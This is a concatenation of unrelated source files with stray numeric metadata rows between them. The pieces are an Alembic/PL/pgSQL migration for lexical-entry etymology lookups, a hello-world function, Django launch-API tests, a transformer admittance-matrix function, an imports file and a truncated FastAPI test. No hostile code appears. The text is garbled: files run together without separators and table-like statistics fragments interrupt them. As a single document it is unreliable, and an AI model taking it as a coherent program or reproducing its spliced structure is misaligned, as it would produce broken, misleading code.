E.marked_for_deletion = false and
P.client_id = E.client_id and
P.object_id = E.object_id and
(accept is null or P.accepted = accept) and
(publish is null or P.published = publish)
on conflict do nothing
returning *)
insert into tag_list_b
select * from tag_cte;
truncate table tag_list_a;
-- The next batch of additional tags.
if exists (
select 1 from tag_list_b) then
with
entry_id_cte as (
insert into entry_id_table
select
L.client_id,
L.object_id
from
lexicalentry L,
public.entity E,
publishingentity P
where
L.marked_for_deletion = false and
E.parent_client_id = L.client_id and
E.parent_object_id = L.object_id and
E.field_client_id = entity_field_client_id and
E.field_object_id = entity_field_object_id and
E.marked_for_deletion = false and
E.content in (
select * from tag_list_b) and
P.client_id = E.client_id and
P.object_id = E.object_id and
(accept is null or P.accepted = accept) and
(publish is null or P.published = publish)
on conflict do nothing
returning *),
tag_cte as (
insert into tag_table
select distinct E.content
from
public.entity E,
publishingentity P
where
(E.parent_client_id, E.parent_object_id) in (
select * from entry_id_cte) and
E.field_client_id = entity_field_client_id and
E.field_object_id = entity_field_object_id and
E.marked_for_deletion = false and
P.client_id = E.client_id and
P.object_id = E.object_id and
(accept is null or P.accepted = accept) and
(publish is null or P.published = publish)
on conflict do nothing
returning *)
insert into tag_list_a
select * from tag_cte;
truncate table tag_list_b;
end if;
end loop;
end;
$$ language plpgsql;
''')
# linked_cycle_no_publishing(field_id, field_id): same closure loop
# without the publishingentity join.
op.execute('''
/*
* Like linked_cycle(), but does not join with publishingentity, so is
* equivalent to linked_cycle(_, _, null, null), but should be faster.
*/
create or replace function
linked_cycle_no_publishing(
entity_field_client_id BIGINT,
entity_field_object_id BIGINT)
returns void as $$
begin
-- Gathering all entries until no unprocessed tags are left.
while exists (
select 1 from tag_list_a) loop
with
entry_id_cte as (
insert into entry_id_table
select
L.client_id,
L.object_id
from
lexicalentry L,
public.entity E
where
L.marked_for_deletion = false and
E.parent_client_id = L.client_id and
E.parent_object_id = L.object_id and
E.field_client_id = entity_field_client_id and
E.field_object_id = entity_field_object_id and
E.marked_for_deletion = false and
E.content in (
select * from tag_list_a)
on conflict do nothing
returning *),
tag_cte as (
insert into tag_table
select distinct E.content
from public.entity E
where
(E.parent_client_id, E.parent_object_id) in (
select * from entry_id_cte) and
E.field_client_id = entity_field_client_id and
E.field_object_id = entity_field_object_id and
E.marked_for_deletion = false
on conflict do nothing
returning *)
insert into tag_list_b
select * from tag_cte;
truncate table tag_list_a;
-- The next batch of additional tags.
if exists (
select 1 from tag_list_b) then
with
entry_id_cte as (
insert into entry_id_table
select
L.client_id,
L.object_id
from
lexicalentry L,
public.entity E
where
L.marked_for_deletion = false and
E.parent_client_id = L.client_id and
E.parent_object_id = L.object_id and
E.field_client_id = entity_field_client_id and
E.field_object_id = entity_field_object_id and
E.marked_for_deletion = false and
E.content in (
select * from tag_list_b)
on conflict do nothing
returning *),
tag_cte as (
insert into tag_table
select distinct E.content
from public.entity E
where
(E.parent_client_id, E.parent_object_id) in (
select * from entry_id_cte) and
E.field_client_id = entity_field_client_id and
E.field_object_id = entity_field_object_id and
E.marked_for_deletion = false
on conflict do nothing
returning *)
insert into tag_list_a
select * from tag_cte;
truncate table tag_list_b;
end if;
end loop;
end;
$$ language plpgsql;
''')
# linked_group(field_id, field_id, entry_id, entry_id, publish, accept):
# entry point starting from a single lexical entry; sets up the temp
# tables, seeds the tag lists, runs linked_cycle and returns entry ids.
op.execute('''
/*
* Finds a group of lexical entries linked through a specified link
* field, starting from a given entry.
*/
create or replace function
linked_group(
entity_field_client_id BIGINT,
entity_field_object_id BIGINT,
entry_client_id BIGINT,
entry_object_id BIGINT,
publish BOOLEAN = true,
accept BOOLEAN = true)
returns table (
client_id BIGINT,
object_id BIGINT) as $$
begin
-- Temporary table for lexical entry ids.
create temporary table
if not exists
entry_id_table (
client_id BIGINT,
object_id BIGINT,
primary key (client_id, object_id))
on commit drop;
insert into entry_id_table
values (entry_client_id, entry_object_id);
-- Temporary table for etymological tags.
create temporary table
if not exists
tag_table (
tag TEXT primary key)
on commit drop;
-- Temporary tables for tags to be processed.
create temporary table
if not exists
tag_list_a (
tag TEXT)
on commit drop;
create temporary table
if not exists
tag_list_b (
tag TEXT)
on commit drop;
-- Initial batch of additional tags.
with
tag_cte as (
insert into tag_table
select distinct E.content
from
public.entity E,
publishingentity P
where
E.parent_client_id = entry_client_id and
E.parent_object_id = entry_object_id and
E.field_client_id = entity_field_client_id and
E.field_object_id = entity_field_object_id and
E.marked_for_deletion = false and
P.client_id = E.client_id and
P.object_id = E.object_id and
(accept is null or P.accepted = accept) and
(publish is null or P.published = publish)
on conflict do nothing
returning *)
insert into tag_list_a
select * from tag_cte;
-- Gathering and returning linked lexical entries.
perform linked_cycle(
entity_field_client_id,
entity_field_object_id,
publish,
accept);
return query
select * from entry_id_table;
truncate table entry_id_table;
truncate table tag_table;
end;
$$ language plpgsql;
''')
# linked_group_no_publishing(...): same entry point without the
# publishingentity joins (publish/accept parameters are ignored).
op.execute('''
/*
* Like linked_group(), but does not join with publishingentity, so is
* equivalent to linked_group(_, _, _, _, null, null), but should be
* faster.
*/
create or replace function
linked_group_no_publishing(
entity_field_client_id BIGINT,
entity_field_object_id BIGINT,
entry_client_id BIGINT,
entry_object_id BIGINT,
publish BOOLEAN = true,
accept BOOLEAN = true)
returns table (
client_id BIGINT,
object_id BIGINT) as $$
begin
-- Temporary table for lexical entry ids.
create temporary table
if not exists
entry_id_table (
client_id BIGINT,
object_id BIGINT,
primary key (client_id, object_id))
on commit drop;
insert into entry_id_table
values (entry_client_id, entry_object_id);
-- Temporary table for etymological tags.
create temporary table
if not exists
tag_table (
tag TEXT primary key)
on commit drop;
-- Temporary tables for tags to be processed.
create temporary table
if not exists
tag_list_a (
tag TEXT)
on commit drop;
create temporary table
if not exists
tag_list_b (
tag TEXT)
on commit drop;
-- Initial batch of additional tags.
with
tag_cte as (
insert into tag_table
select distinct E.content
from public.entity E
where
E.parent_client_id = entry_client_id and
E.parent_object_id = entry_object_id and
E.field_client_id = entity_field_client_id and
E.field_object_id = entity_field_object_id and
E.marked_for_deletion = false
on conflict do nothing
returning *)
insert into tag_list_a
select * from tag_cte;
-- Gathering and returning linked lexical entries.
perform linked_cycle_no_publishing(
entity_field_client_id,
entity_field_object_id);
return query
select * from entry_id_table;
truncate table entry_id_table;
truncate table tag_table;
end;
$$ language plpgsql;
''')
# linked_group(field_id, field_id, tag, publish, accept): overload of
# linked_group that starts from a link tag instead of an entry.
op.execute('''
/*
* Finds a group of lexical entries linked through a specified link
* field, starting from a link tag.
*/
create or replace function
linked_group(
entity_field_client_id BIGINT,
entity_field_object_id BIGINT,
tag TEXT,
publish BOOLEAN = true,
accept BOOLEAN = true)
returns table (
client_id BIGINT,
object_id BIGINT) as $$
begin
-- Temporary table for lexical entry ids.
create temporary table
if not exists
entry_id_table (
client_id BIGINT,
object_id BIGINT,
primary key (client_id, object_id))
on commit drop;
insert into entry_id_table
select
L.client_id,
L.object_id
from
lexicalentry L,
public.entity E,
publishingentity P
where
L.marked_for_deletion = false and
E.parent_client_id = L.client_id and
E.parent_object_id = L.object_id and
E.field_client_id = entity_field_client_id and
E.field_object_id = entity_field_object_id and
E.marked_for_deletion = false and
E.content = tag and
P.client_id = E.client_id and
P.object_id = E.object_id and
(accept is null or P.accepted = accept) and
(publish is null or P.published = publish)
on conflict do nothing;
-- Temporary table for etymological tags.
create temporary table
if not exists
tag_table (
tag TEXT primary key)
on commit drop;
insert into tag_table
values (tag);
-- Temporary tables for tags to be processed.
create temporary table
if not exists
tag_list_a (
tag TEXT)
on commit drop;
create temporary table
if not exists
tag_list_b (
tag TEXT)
on commit drop;
-- Initial batch of additional tags.
with
tag_cte as (
insert into tag_table
select distinct E.content
from
public.entity E,
publishingentity P
where
(E.parent_client_id, E.parent_object_id) in (
select * from entry_id_table) and
E.field_client_id = entity_field_client_id and
E.field_object_id = entity_field_object_id and
E.marked_for_deletion = false and
P.client_id = E.client_id and
P.object_id = E.object_id and
(accept is null or P.accepted = accept) and
(publish is null or P.published = publish)
on conflict do nothing
returning *)
insert into tag_list_a
select * from tag_cte;
-- Gathering and returning linked lexical entries.
perform linked_cycle(
entity_field_client_id,
entity_field_object_id,
publish,
accept);
return query
select * from entry_id_table;
truncate table entry_id_table;
truncate table tag_table;
end;
$$ language plpgsql;
''')
# text_field_id_view: materialized view of non-deleted text field ids,
# plus a unique index enabling concurrent refresh / fast lookups.
op.execute('''
/*
* Non-deleted text fields, used for getting etymology text info, see
* etymology_text() and etymology_group_text().
*/
create materialized view
text_field_id_view as
select
client_id,
object_id
from field
where
data_type_translation_gist_client_id = 1 and
data_type_translation_gist_object_id = 47 and
marked_for_deletion = false;
create unique index
text_field_id_view_idx on
text_field_id_view (
client_id, object_id);
''')
# etymology_text(tag, publish): per-entry '; '-aggregated text content
# of an etymologically linked group (link field hard-coded as 66/25).
op.execute('''
/*
* Returns aggregated text data of an etymologically linked lexical
* entry group.
*/
create or replace function
etymology_text(
tag TEXT,
publish BOOLEAN = true)
returns table (
content TEXT) as $$
begin
-- Returning data of each linked lexical entry.
return query
select
string_agg(E.content, '; ')
from
public.entity E,
publishingentity P
where
(E.parent_client_id, E.parent_object_id) in (
select * from linked_group(66, 25, tag, publish)) and
(E.field_client_id, E.field_object_id) in (
select * from text_field_id_view) and
E.marked_for_deletion = false and
E.content is not null and
P.client_id = E.client_id and
P.object_id = E.object_id and
P.accepted = true and
(publish is null or P.published = publish)
group by (
E.parent_client_id, E.parent_object_id);
end;
$$ language plpgsql;
''')
# etymology_group_text(tag, publish): as above, but also returns the
# entry ids and truncates linked_group's temp tables afterwards.
# NOTE(review): etymology_text() does not truncate these tables while
# this function does — looks intentional (callers of this one may run
# several lookups per transaction), but confirm against the callers.
op.execute('''
/*
* Returns aggregated text data and lexical entry ids of an
* etymologically linked lexical entry group.
*/
create or replace function
etymology_group_text(
tag TEXT,
publish BOOLEAN = true)
returns table (
client_id BIGINT,
object_id BIGINT,
content TEXT) as $$
begin
-- Returning data of each linked lexical entry.
return query
select
E.parent_client_id,
E.parent_object_id,
string_agg(E.content, '; ')
from
public.entity E,
publishingentity P
where
(E.parent_client_id, E.parent_object_id) in (
select * from linked_group(66, 25, tag, publish)) and
(E.field_client_id, E.field_object_id) in (
select * from text_field_id_view) and
E.marked_for_deletion = false and
E.content is not null and
P.client_id = E.client_id and
P.object_id = E.object_id and
P.accepted = true and
(publish is null or P.published = publish)
group by (
E.parent_client_id, E.parent_object_id);
truncate table entry_id_table;
truncate table tag_table;
end;
$$ language plpgsql;
''')
def downgrade():
    """Remove everything created by upgrade(): the linked-group and
    etymology helper functions and the text_field_id_view materialized
    view. Statements run in the original order; ``if exists`` makes the
    downgrade idempotent."""
    drop_statements = (
        'drop function if exists linked_cycle(bigint, bigint, boolean, boolean);',
        'drop function if exists linked_cycle_no_publishing(bigint, bigint);',
        'drop function if exists linked_group(bigint, bigint, bigint, bigint, boolean, boolean);',
        'drop function if exists linked_group_no_publishing(bigint, bigint, bigint, bigint, boolean, boolean);',
        'drop function if exists linked_group(bigint, bigint, text, boolean, boolean);',
        'drop materialized view if exists text_field_id_view;',
        'drop function if exists etymology_text(text, boolean);',
        'drop function if exists etymology_group_text(text, boolean);',
    )
    for statement in drop_statements:
        op.execute(statement)
| 25.272295
| 112
| 0.530865
| 2,396
| 21,254
| 4.459933
| 0.071786
| 0.073367
| 0.021336
| 0.035561
| 0.926446
| 0.920176
| 0.910163
| 0.900524
| 0.878533
| 0.878533
| 0
| 0.005441
| 0.42058
| 21,254
| 840
| 113
| 25.302381
| 0.862282
| 0.007199
| 0
| 0.895652
| 0
| 0
| 0.972263
| 0.077806
| 0
| 0
| 0
| 0
| 0
| 1
| 0.003478
| false
| 0
| 0.003478
| 0
| 0.015652
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3fac02411248ae6bff234ce2f00cc78b5e22bb71
| 41
|
py
|
Python
|
python-oo/examples/schoolofnet/string/str.py
|
marcelloti/COURSE-Iniciando-com-python
|
7fffd5bc3f5a8a8dd1d0cd2abb8b2e51ba9f0202
|
[
"MIT"
] | null | null | null |
python-oo/examples/schoolofnet/string/str.py
|
marcelloti/COURSE-Iniciando-com-python
|
7fffd5bc3f5a8a8dd1d0cd2abb8b2e51ba9f0202
|
[
"MIT"
] | null | null | null |
python-oo/examples/schoolofnet/string/str.py
|
marcelloti/COURSE-Iniciando-com-python
|
7fffd5bc3f5a8a8dd1d0cd2abb8b2e51ba9f0202
|
[
"MIT"
] | null | null | null |
def hello():
    """Return the classic greeting string."""
    greeting = "Hello World!"
    return greeting
| 13.666667
| 27
| 0.585366
| 5
| 41
| 4.8
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.219512
| 41
| 2
| 28
| 20.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0.292683
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
3ff4f2a801e34dce974ed62942db41a45930eab5
| 7,421
|
py
|
Python
|
src/bot/tests/launches/test_launches_sln_310.py
|
ItsCalebJones/SpaceLaunchNow_API
|
09289068465c462557649172792ab0f41f833028
|
[
"Apache-2.0"
] | 11
|
2017-06-26T05:01:31.000Z
|
2019-09-13T18:48:27.000Z
|
src/bot/tests/launches/test_launches_sln_310.py
|
ItsCalebJones/SpaceLaunchNow_API
|
09289068465c462557649172792ab0f41f833028
|
[
"Apache-2.0"
] | 14
|
2019-01-30T23:13:34.000Z
|
2019-10-08T10:43:36.000Z
|
src/bot/tests/launches/test_launches_sln_310.py
|
ItsCalebJones/SpaceLaunchNow_API
|
09289068465c462557649172792ab0f41f833028
|
[
"Apache-2.0"
] | 5
|
2018-04-24T16:52:59.000Z
|
2018-08-22T14:06:01.000Z
|
import json
import unittest
from datetime import timedelta
from rest_framework import status
from api.models import *
from api.tests.test__base import LLAPITests, settings
class LaunchSLNv310Tests(LLAPITests):
    """Tests for the SLN 3.1.0 launch API.

    Covers the upcoming/previous listings in normal, list and detailed
    modes, plus a single-launch detail view. All tests are skipped on
    Launch Library deployments (``settings.IS_LL``).
    """

    def _get_json(self, path):
        """GET *path*, assert HTTP 200, and return the decoded JSON body."""
        response = self.client.get(path)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        return json.loads(response.content.decode('utf-8'))

    def _upcoming_count(self):
        """Expected upcoming-list size: Launch Library launches with a
        NET no more than one day in the past."""
        return Launch.objects.filter(
            net__gte=timezone.now() - timedelta(days=1)).filter(
            launch_library=True).count()

    def _previous_count(self):
        """Expected previous-list size: Launch Library launches whose
        NET has already passed."""
        return Launch.objects.filter(
            net__lte=timezone.now()).filter(launch_library=True).count()

    def _check_launch_list(self, path, expected_count, detailed=False):
        """Fetch *path* and verify the paginated launch payload.

        Asserts the total ``count``, then for each result checks the
        serialized fields against the matching ``Launch`` row and that
        the deprecated ``netstamp``/``isonet`` fields are absent. With
        *detailed*, also checks the expanded ``lsp`` serialization.
        Finishes with the shared endpoint permission checks.
        """
        data = self._get_json(path)
        self.assertEqual(data['count'], expected_count)
        for result in data['results']:
            launch = Launch.objects.get(launch_library_id=result['id'])
            self.assertEqual(result['id'], launch.launch_library_id)
            self.assertEqual(result['name'], launch.name)
            self.assertNotIn('netstamp', result)
            self.assertNotIn('isonet', result)
            self.assertIn('name', result['status'])
            # 'lsp' may be null, so guard before inspecting its fields.
            if detailed and result['lsp']:
                self.assertIn('founding_year', result['lsp'])
        self.check_permissions(path)

    @unittest.skipIf(settings.IS_LL, "Not supported in this configuration.")
    def test_upcoming_normal(self):
        """Ensure launch endpoints work as expected."""
        self._check_launch_list('/3.1.0/launch/upcoming/?limit=1',
                                self._upcoming_count())

    @unittest.skipIf(settings.IS_LL, "Not supported in this configuration.")
    def test_upcoming_list(self):
        """Ensure launch endpoints work as expected."""
        self._check_launch_list('/3.1.0/launch/upcoming/?limit=1&mode=list',
                                self._upcoming_count())

    @unittest.skipIf(settings.IS_LL, "Not supported in this configuration.")
    def test_upcoming_detailed(self):
        """Ensure launch endpoints work as expected."""
        self._check_launch_list(
            '/3.1.0/launch/upcoming/?limit=1&mode=detailed',
            self._upcoming_count(), detailed=True)

    @unittest.skipIf(settings.IS_LL, "Not supported in this configuration.")
    def test_previous_normal(self):
        """Ensure launch endpoints work as expected."""
        self._check_launch_list('/3.1.0/launch/previous/?limit=1',
                                self._previous_count())

    @unittest.skipIf(settings.IS_LL, "Not supported in this configuration.")
    def test_previous_list(self):
        """Ensure launch endpoints work as expected."""
        self._check_launch_list('/3.1.0/launch/previous/?limit=1&mode=list',
                                self._previous_count())

    @unittest.skipIf(settings.IS_LL, "Not supported in this configuration.")
    def test_previous_detailed(self):
        """Ensure launch endpoints work as expected."""
        # BUGFIX: the original asserted 'founding_year' in data['lsp']
        # without first checking that 'lsp' is non-null (unlike the
        # upcoming detailed test); the shared helper applies the guard
        # consistently.
        self._check_launch_list(
            '/3.1.0/launch/previous/?limit=1&mode=detailed',
            self._previous_count(), detailed=True)

    @unittest.skipIf(settings.IS_LL, "Not supported in this configuration.")
    def test_launch_with_landings(self):
        """A single-launch detail response is a bare object: no pagination
        envelope, ISO window fields present, deprecated *stamp and iso*
        shorthand fields absent."""
        launch = Launch.objects.get(launch_library_id=864)
        data = self._get_json('/3.1.0/launch/864/')
        # Detail responses must not carry the pagination envelope.
        for key in ('next', 'result', 'previous', 'count'):
            self.assertNotIn(key, data)
        self.assertEqual(data['id'], launch.launch_library_id)
        self.assertEqual(data['name'], launch.name)
        self.assertIn('slug', data)
        self.assertEqual(data['status']['id'], launch.status.id)
        # Deprecated timestamp / ISO shorthand fields were removed in 3.1.0.
        for key in ('netstamp', 'wsstamp', 'westamp',
                    'isonet', 'isostart', 'isoend'):
            self.assertNotIn(key, data)
        self.assertIn('net', data)
        self.assertIn('window_end', data)
        self.assertIn('window_start', data)
| 44.437126
| 143
| 0.640345
| 882
| 7,421
| 5.272109
| 0.111111
| 0.090323
| 0.085806
| 0.05871
| 0.888817
| 0.886022
| 0.869892
| 0.851183
| 0.851183
| 0.847742
| 0
| 0.011604
| 0.221938
| 7,421
| 166
| 144
| 44.704819
| 0.793731
| 0.050937
| 0
| 0.709677
| 0
| 0
| 0.137141
| 0.033923
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.056452
| false
| 0
| 0.048387
| 0
| 0.112903
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b748b7520b3cc02a84224d53b7028891fb039ffb
| 16,743
|
py
|
Python
|
pydgrid/transformers.py
|
pydgrid/pydgrid
|
c56073c385f42883c79333533f7cfb8383a173aa
|
[
"MIT"
] | 15
|
2019-01-29T08:22:39.000Z
|
2022-01-13T20:41:32.000Z
|
pydgrid/transformers.py
|
pydgrid/pydgrid
|
c56073c385f42883c79333533f7cfb8383a173aa
|
[
"MIT"
] | 1
|
2017-11-28T21:34:52.000Z
|
2017-11-28T21:34:52.000Z
|
pydgrid/transformers.py
|
pydgrid/pydgrid
|
c56073c385f42883c79333533f7cfb8383a173aa
|
[
"MIT"
] | 4
|
2018-02-15T02:12:47.000Z
|
2020-02-16T17:52:15.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Sun Mar 5 13:04:45 2017
@author: jmmauricio
"""
import numpy as np
import difflib
def trafo_yprim(S_n, U_1n, U_2n, Z_cc, connection='Dyg11'):
    '''
    Transformer primitive admittance matrix, as developed in (in the paper Ynd11):

    R. C. Dugan and S. Santoso, "An example of 3-phase transformer modeling for
    distribution system analysis," 2003 IEEE PES Transm. Distrib. Conf. Expo.
    (IEEE Cat. No.03CH37495), vol. 3, pp. 1028-1032, 2003.

    Parameters
    ----------
    S_n : float
        Nominal power; divides the short-circuit impedance to scale each winding.
    U_1n : float
        Nominal primary-side voltage.
    U_2n : float
        Nominal secondary-side voltage.
    Z_cc : float or complex
        Short-circuit (leakage) impedance.
    connection : str
        Winding connection label; one of the keys of the tables below.
        NOTE(review): the historical default 'Dyg11' is NOT a supported key
        (only 'Dyg11_3w' is); it is kept for signature compatibility, but
        now raises ValueError instead of crashing with NameError as before.

    Returns
    -------
    numpy.ndarray
        Y_prim = A_trafo @ Y_w @ A_trafo.T; 6x6 or 7x7 depending on whether
        the connection exposes a 7th (neutral) node.

    Raises
    ------
    ValueError
        If `connection` is not supported (the message suggests the closest
        known label when difflib finds one).
    '''
    sqrt3 = np.sqrt(3)

    # Per-connection winding data:
    #   z_factor -> each winding impedance is z_factor * Z_cc / S_n
    #   U_1, U_2 -> per-coil primary/secondary voltages used in the turns matrix N
    winding_data = {
        'Dyn1':      (3.0, U_1n,         U_2n / sqrt3),
        'Yy_3wires': (3.0, U_1n / sqrt3, U_2n / sqrt3),
        'Dyn5':      (3.0, U_1n,         U_2n / sqrt3),
        'Dyn11':     (3.0, U_1n,         U_2n / sqrt3),
        'Ygd5_3w':   (3.0, U_1n,         U_2n * sqrt3),
        'Ygd1_3w':   (3.0, U_1n,         U_2n * sqrt3),
        'Ygd11_3w':  (1.0, U_1n,         U_2n * sqrt3),  # original code has no 3x factor here
        'ZigZag':    (3.0, U_1n,         U_2n),
        'Dyg11_3w':  (3.0, U_1n,         U_2n / sqrt3),
        'Ynd11':     (3.0, U_1n / sqrt3, U_2n),
    }

    # Node incidence: (number_of_external_nodes, (row, col) entries set to 1.0).
    # A_trafo maps the 12 winding terminals onto the external nodes; for
    # 'ZigZag' rows 3-5 are intentionally all-zero, as in the original code.
    a_trafo_data = {
        'Dyn1':      (7, ((0, 0), (0, 9), (1, 1), (1, 4), (2, 5), (2, 8),
                          (3, 2), (4, 6), (5, 10), (6, 3), (6, 7), (6, 11))),
        'Yy_3wires': (6, ((0, 0), (1, 4), (2, 8), (3, 2), (4, 6), (5, 10))),
        'Dyn5':      (7, ((0, 1), (0, 4), (1, 5), (1, 8), (2, 0), (2, 9),
                          (3, 2), (4, 6), (5, 10), (6, 3), (6, 7), (6, 11))),
        'Dyn11':     (7, ((0, 1), (0, 4), (1, 5), (1, 8), (2, 0), (2, 9),
                          (3, 3), (4, 7), (5, 11), (6, 2), (6, 6), (6, 10))),
        'Ygd5_3w':   (6, ((0, 0), (1, 4), (2, 8), (3, 3), (3, 6), (4, 7),
                          (4, 10), (5, 2), (5, 11))),
        'Ygd1_3w':   (6, ((0, 0), (1, 4), (2, 8), (3, 2), (3, 11), (4, 3),
                          (4, 6), (5, 7), (5, 10))),
        'Ygd11_3w':  (6, ((0, 1), (1, 5), (2, 9), (3, 3), (3, 6), (4, 7),
                          (4, 10), (5, 2), (5, 11))),
        'ZigZag':    (7, ((0, 0), (1, 4), (2, 8), (6, 3), (6, 7), (6, 11))),
        'Dyg11_3w':  (6, ((0, 1), (0, 4), (1, 5), (1, 8), (2, 0), (2, 9),
                          (3, 3), (4, 7), (5, 11))),
        'Ynd11':     (7, ((0, 0), (1, 4), (2, 8), (3, 1), (3, 5), (3, 9),
                          (4, 2), (4, 11), (5, 3), (5, 6), (6, 7), (6, 10))),
    }

    if connection not in winding_data:
        # BUG FIX: the original printed a suggestion and then crashed with
        # NameError (and raised IndexError when difflib found no close match).
        matches = difflib.get_close_matches(connection, list(winding_data))
        hint = ', did you mean: "{:s}"?'.format(matches[0]) if matches else ''
        raise ValueError('Transformer connection "{:s}" not found{:s}'.format(connection, hint))

    z_factor, U_1, U_2 = winding_data[connection]
    z_w = z_factor * Z_cc / S_n
    Z_B = np.diag([z_w, z_w, z_w])

    # B maps the 6 coil-terminal currents onto the 3 coil branch currents.
    B = np.array([[ 1, 0, 0],
                  [-1, 0, 0],
                  [ 0, 1, 0],
                  [ 0,-1, 0],
                  [ 0, 0, 1],
                  [ 0, 0,-1]])
    Y_1 = B @ np.linalg.inv(Z_B) @ B.T

    if connection == 'ZigZag':
        # Zig-zag interleaves half-windings of different phases, so the turns
        # matrix is built entry-by-entry rather than block-diagonally.
        N = np.zeros((12, 6))
        for row, col in ((0, 0), (7, 0), (4, 2), (11, 2), (8, 4), (3, 4)):
            N[row, col] = 1.0 / U_1
        for row, col in ((1, 0), (6, 0), (5, 2), (10, 2), (9, 4), (2, 4)):
            N[row, col] = -1.0 / U_1
        for row, col in ((2, 1), (6, 3), (10, 5)):
            N[row, col] = 1.0 / U_2
        for row, col in ((3, 1), (7, 3), (11, 5)):
            N[row, col] = -1.0 / U_2
    else:
        # Three identical two-coil units: block-diagonal stack of the
        # per-phase turns matrix N_a.
        N_a = np.array([[ 1 / U_1, 0],
                        [-1 / U_1, 0],
                        [ 0,  1 / U_2],
                        [ 0, -1 / U_2]])
        N = np.zeros((12, 6))
        for phase in range(3):
            N[4 * phase:4 * phase + 4, 2 * phase:2 * phase + 2] = N_a

    Y_w = N @ Y_1 @ N.T

    n_nodes, entries = a_trafo_data[connection]
    A_trafo = np.zeros((n_nodes, 12))
    for row, col in entries:
        A_trafo[row, col] = 1.0

    Y_prim = A_trafo @ Y_w @ A_trafo.T
    return Y_prim
| 30.948244
| 120
| 0.339425
| 2,911
| 16,743
| 1.748884
| 0.046376
| 0.091141
| 0.06482
| 0.147712
| 0.859753
| 0.833628
| 0.813985
| 0.811236
| 0.807896
| 0.798468
| 0
| 0.173893
| 0.4848
| 16,743
| 541
| 121
| 30.948244
| 0.416184
| 0.139879
| 0
| 0.851064
| 0
| 0
| 0.013501
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.00266
| false
| 0
| 0.005319
| 0
| 0.010638
| 0.00266
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b76c68ab661ace08d8abd6aeaef4ef7a76a60acc
| 109
|
py
|
Python
|
api/v1/generics/__init__.py
|
vulnman/vulnman
|
d48ee022bc0e4368060a990a527b1c7a5e437504
|
[
"MIT"
] | 3
|
2021-12-22T07:02:24.000Z
|
2022-01-27T20:19:11.000Z
|
api/v1/generics/__init__.py
|
vulnman/vulnman
|
d48ee022bc0e4368060a990a527b1c7a5e437504
|
[
"MIT"
] | 44
|
2021-12-14T07:24:29.000Z
|
2022-03-23T07:01:16.000Z
|
api/v1/generics/__init__.py
|
vulnman/vulnman
|
d48ee022bc0e4368060a990a527b1c7a5e437504
|
[
"MIT"
] | 1
|
2022-01-21T16:29:56.000Z
|
2022-01-21T16:29:56.000Z
|
from api.v1.generics.agents import AgentModelViewSet
from api.v1.generics.session import SessionModelViewSet
| 36.333333
| 55
| 0.87156
| 14
| 109
| 6.785714
| 0.642857
| 0.147368
| 0.189474
| 0.357895
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019802
| 0.073395
| 109
| 2
| 56
| 54.5
| 0.920792
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b7ce8d7108417fe7d2882a144d44be43f9e5e0cf
| 2,718
|
py
|
Python
|
tests/test_guests.py
|
questionlp/api.wwdt.me_fastapi
|
fa8c24a36c5c6f2ece985a4d6e0e40201ac700dc
|
[
"Apache-2.0"
] | null | null | null |
tests/test_guests.py
|
questionlp/api.wwdt.me_fastapi
|
fa8c24a36c5c6f2ece985a4d6e0e40201ac700dc
|
[
"Apache-2.0"
] | 1
|
2022-01-03T15:48:29.000Z
|
2022-01-03T15:48:29.000Z
|
tests/test_guests.py
|
questionlp/api.wwdt.me_fastapi
|
fa8c24a36c5c6f2ece985a4d6e0e40201ac700dc
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2018-2021 Linh Pham
# api.wwdt.me is released under the terms of the Apache License 2.0
"""Testing /v2.0/guests routes
"""
from fastapi.testclient import TestClient
import pytest
from app.main import app
from app.config import API_VERSION
client = TestClient(app)
def test_guests():
    """Test /v2.0/guests route"""
    resp = client.get(f"/v{API_VERSION}/guests")
    payload = resp.json()
    assert resp.status_code == 200
    assert "guests" in payload
    # The first guest entry must carry the basic identification fields.
    first = payload["guests"][0]
    for key in ("id", "name", "slug"):
        assert key in first
@pytest.mark.parametrize("guest_id", [54])
def test_guests_id(guest_id: int):
    """Test /v2.0/guests/id/{guest_id} route"""
    resp = client.get(f"/v{API_VERSION}/guests/id/{guest_id}")
    guest = resp.json()
    assert resp.status_code == 200
